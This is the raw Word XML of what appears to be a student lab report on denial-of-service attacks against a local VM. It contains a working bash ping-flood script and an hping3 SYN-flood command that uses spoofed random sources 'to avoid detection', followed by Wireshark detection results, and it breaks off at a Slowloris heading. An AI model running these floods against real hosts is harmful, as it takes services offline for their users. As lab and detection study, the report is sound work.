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0E15A" w14:textId="1BABF1C5" w:rsidR="00491742" w:rsidRPr="00491742" w:rsidRDefault="00491742">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491742">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I did tried couple of varia</w:t>
      </w:r>
      <w:r w:rsidR="00446344">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tion</w:t>
      </w:r>
      <w:r w:rsidRPr="00491742">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of DOS with available tool </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00491742">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00491742">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrote a script for ping attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F909001" w14:textId="36F4AEC1" w:rsidR="00383CF2" w:rsidRPr="00883696" w:rsidRDefault="00491742">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00356E96" w:rsidRPr="00883696">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ping DOS Attack local VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C734D" w14:textId="09014FB8" w:rsidR="00896021" w:rsidRDefault="00896021">
      <w:r>
        <w:t xml:space="preserve">Used bash script to employ simple </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ping based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DOS on single host in subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1612E" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>usr/bin/env bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60620B05" w14:textId="149504CA" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">  # Local denial-of-service script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4DB56E" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t>host="$1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36050B" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t>shift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C46CB" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> declare -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C958D" w14:textId="5D7F5421" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> declare -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> duration=5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E204AF" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">  # Set parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA8BD5" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getopts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:" opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3033578D" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB288A6" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">         case $opt in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28312CA3" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">           n) let </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>OPTARG;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="018A2503" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">           t) let duration=$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>OPTARG;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2BBA959E" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">           \?) echo "Usage: ./dos-ping.sh host [-n </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] [-t duration]" &gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="300AAAB6" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2443E511" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB7904F" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">  # Launch DoS attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2801B3" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">(( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=0; $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&lt;$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>++ ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D60DD7" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDDB477" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">         ping "$host" &gt; /dev/null &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07611E63" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D777AF" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">  # Wait and stop attack: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17457F" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve">  sleep $duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39602730" w14:textId="2EDD5596" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>killall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CC2B6A" w14:textId="77777777" w:rsidR="00896021" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> # Cleanup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CEAB2" w14:textId="0BAA4638" w:rsidR="00356E96" w:rsidRDefault="00896021" w:rsidP="00896021">
      <w:r>
        <w:t xml:space="preserve"> unset opt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA7F208" w14:textId="2A951928" w:rsidR="00356E96" w:rsidRDefault="00356E96"/>
    <w:p w14:paraId="34F2E3EE" w14:textId="17B7B07E" w:rsidR="00896021" w:rsidRDefault="00896021">
      <w:r>
        <w:t>Attack started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA97D4" w14:textId="0B6EB000" w:rsidR="00896021" w:rsidRDefault="00896021">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3062946B" wp14:editId="3898C222">
            <wp:extent cx="5943600" cy="227393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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2273935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41321884" w14:textId="466C0F3C" w:rsidR="00356E96" w:rsidRDefault="00356E96"/>
    <w:p w14:paraId="3A915D4B" w14:textId="75B4E0AE" w:rsidR="00110CA2" w:rsidRDefault="00110CA2"/>
    <w:p w14:paraId="371C7CA1" w14:textId="778F4862" w:rsidR="00110CA2" w:rsidRDefault="00110CA2">
      <w:r>
        <w:t>Attack detected using Wireshark</w:t>
      </w:r>
      <w:r w:rsidR="005B2B0E">
        <w:t xml:space="preserve"> on the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B6690" w14:textId="2B956187" w:rsidR="00110CA2" w:rsidRDefault="00896021">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CCB4260" wp14:editId="0F7585A7">
            <wp:extent cx="5943600" cy="3878580"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3878580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE5228" w14:textId="6D6E2BA5" w:rsidR="00356E96" w:rsidRDefault="00BD7116">
      <w:r>
        <w:t xml:space="preserve">A spike is detected in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I/</w:t>
      </w:r>
      <w:r w:rsidR="00441900">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> graph with nearly 2500 packets per sec. when executed above </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with 1000 ping with 1 sec sleep cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A589AD0" w14:textId="77777777" w:rsidR="009239E9" w:rsidRDefault="004F0D57">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The perform is impact minutely if use 500 ping /sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE34F9" w14:textId="4E709E8A" w:rsidR="00356E96" w:rsidRPr="009239E9" w:rsidRDefault="00491742">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00356E96" w:rsidRPr="003A1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r w:rsidR="00F7789A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidR="00356E96" w:rsidRPr="003A1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOS </w:t>
      </w:r>
      <w:r w:rsidR="00745725">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">using Hping3 </w:t>
      </w:r>
      <w:r w:rsidR="00356E96" w:rsidRPr="003A1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">on local </w:t>
      </w:r>
      <w:r w:rsidR="001F4D9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E10FB6" w14:textId="02D8D85F" w:rsidR="003A1FD3" w:rsidRDefault="003A1FD3">
      <w:r>
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r w:rsidR="00F7789A">
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dos attack is most common DOS attack used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698406A8" w14:textId="09003C97" w:rsidR="002548C7" w:rsidRDefault="002548C7"/>
    <w:p w14:paraId="091796D2" w14:textId="45289A8D" w:rsidR="002548C7" w:rsidRDefault="002548C7" w:rsidP="002548C7">
      <w:r>
        <w:t>hping3 -c 1500 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="00867EAA">
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA686D" w14:textId="1FCE5A54" w:rsidR="009B62FB" w:rsidRDefault="009B62FB" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">using rand-source avoid detection by </w:t>
      </w:r>
      <w:r w:rsidR="00DF2398">
        <w:t xml:space="preserve">spoofing IP address and also </w:t>
      </w:r>
      <w:r w:rsidR="005829CA">
        <w:t>discarding</w:t>
      </w:r>
      <w:r w:rsidR="00DF2398">
        <w:t xml:space="preserve"> victim SYN-ACK </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DF2398">
        <w:t xml:space="preserve">reply </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00876488">
        <w:t xml:space="preserve">For ease of identifying packet in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00876488">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00876488">
        <w:t xml:space="preserve"> u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sing </w:t>
      </w:r>
      <w:r w:rsidR="009D1028">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidR="009D1028">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5B6B">
        <w:t>define number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of packet, 120 is packet </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>size ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">-w for </w:t>
      </w:r>
      <w:r w:rsidR="004C189F">
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r>
        <w:t>window size, and -S for SYN only transmission</w:t>
      </w:r>
      <w:r w:rsidR="00876488">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526EAC9E" w14:textId="7AE10256" w:rsidR="00745725" w:rsidRDefault="00745725" w:rsidP="002548C7"/>
    <w:p w14:paraId="25238E63" w14:textId="1E668665" w:rsidR="00745725" w:rsidRDefault="00745725" w:rsidP="002548C7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on attacker</w:t>
      </w:r>
      <w:r w:rsidR="003929A7">
        <w:t xml:space="preserve"> side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2599B082" w14:textId="141528E5" w:rsidR="00745725" w:rsidRDefault="00745725" w:rsidP="002548C7"/>
    <w:p w14:paraId="0ACE9F7A" w14:textId="0B3EA09B" w:rsidR="00745725" w:rsidRDefault="00745725" w:rsidP="002548C7"/>
    <w:p w14:paraId="7B4C58F1" w14:textId="77777777" w:rsidR="002D65A0" w:rsidRDefault="002D65A0" w:rsidP="002548C7"/>
    <w:p w14:paraId="6921335C" w14:textId="3DE1D3E0" w:rsidR="002548C7" w:rsidRDefault="005F1DE0" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002548C7">
        <w:t>tcp.flags.syn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002548C7">
        <w:t xml:space="preserve"> == 1 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002548C7">
        <w:t>tcp.flags.ack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002548C7">
        <w:t xml:space="preserve"> == 0</w:t>
      </w:r>
      <w:r w:rsidR="003C3E4C">
        <w:t xml:space="preserve"> on victim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003C3E4C">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C3E4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> huge</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> TCP traffic </w:t>
      </w:r>
      <w:r w:rsidR="003C3E4C">
        <w:t>detect</w:t>
      </w:r>
      <w:r>
        <w:t>ed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912DFDC" w14:textId="727F3613" w:rsidR="003C3E4C" w:rsidRDefault="003C3E4C" w:rsidP="002548C7"/>
    <w:p w14:paraId="73AFA1D8" w14:textId="7CA4156C" w:rsidR="002548C7" w:rsidRDefault="00D75BA8" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25192254" wp14:editId="52D4450B">
            <wp:extent cx="5943600" cy="4110990"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4110990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6DC80" w14:textId="41711CF2" w:rsidR="00273E2D" w:rsidRDefault="00273E2D" w:rsidP="002548C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Even the protocol hierarchy show 80 % TCP traffic which is abnormal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B703779" w14:textId="57490BEA" w:rsidR="00273E2D" w:rsidRDefault="00273E2D" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285AE880" wp14:editId="2EF46338">
            <wp:extent cx="5943600" cy="2799080"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2799080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F9828C" w14:textId="49121837" w:rsidR="002548C7" w:rsidRDefault="002548C7" w:rsidP="002548C7"/>
    <w:p w14:paraId="5637CA46" w14:textId="6AC5C750" w:rsidR="002548C7" w:rsidRDefault="002548C7" w:rsidP="002548C7">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>after sometime</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="002D65A0">
        <w:t xml:space="preserve"> victim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="003C3E4C">
        <w:t>stop responding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB61BA8" w14:textId="6212FC66" w:rsidR="002D65A0" w:rsidRDefault="002D65A0" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D69C24E" wp14:editId="14D41F4D">
            <wp:extent cx="5943600" cy="2968625"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2968625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5EAB7C" w14:textId="00E57949" w:rsidR="002548C7" w:rsidRDefault="002548C7" w:rsidP="002548C7"/>
    <w:p w14:paraId="7E6A92B3" w14:textId="598ACB2C" w:rsidR="002548C7" w:rsidRDefault="002548C7" w:rsidP="002548C7"/>
    <w:p w14:paraId="3CA13CD0" w14:textId="10A6CBA3" w:rsidR="002548C7" w:rsidRDefault="002548C7" w:rsidP="002548C7"/>
    <w:p w14:paraId="335983E1" w14:textId="0C251925" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7"/>
    <w:p w14:paraId="06426215" w14:textId="3BB9779A" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7"/>
    <w:p w14:paraId="552E1CB8" w14:textId="4B7E7EF6" w:rsidR="001C30D1" w:rsidRDefault="004C3F9C" w:rsidP="002548C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="006740A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Dead</w:t>
      </w:r>
      <w:r w:rsidR="001C30D1" w:rsidRPr="006740A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Bo</w:t>
      </w:r>
      <w:r w:rsidR="00CB1DFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="001C30D1" w:rsidRPr="006740A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ring DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3FD873" w14:textId="5CC52860" w:rsidR="00CB1DFB" w:rsidRPr="00CB1DFB" w:rsidRDefault="00CB1DFB" w:rsidP="002548C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Slowloris</w:t>
      </w:r>
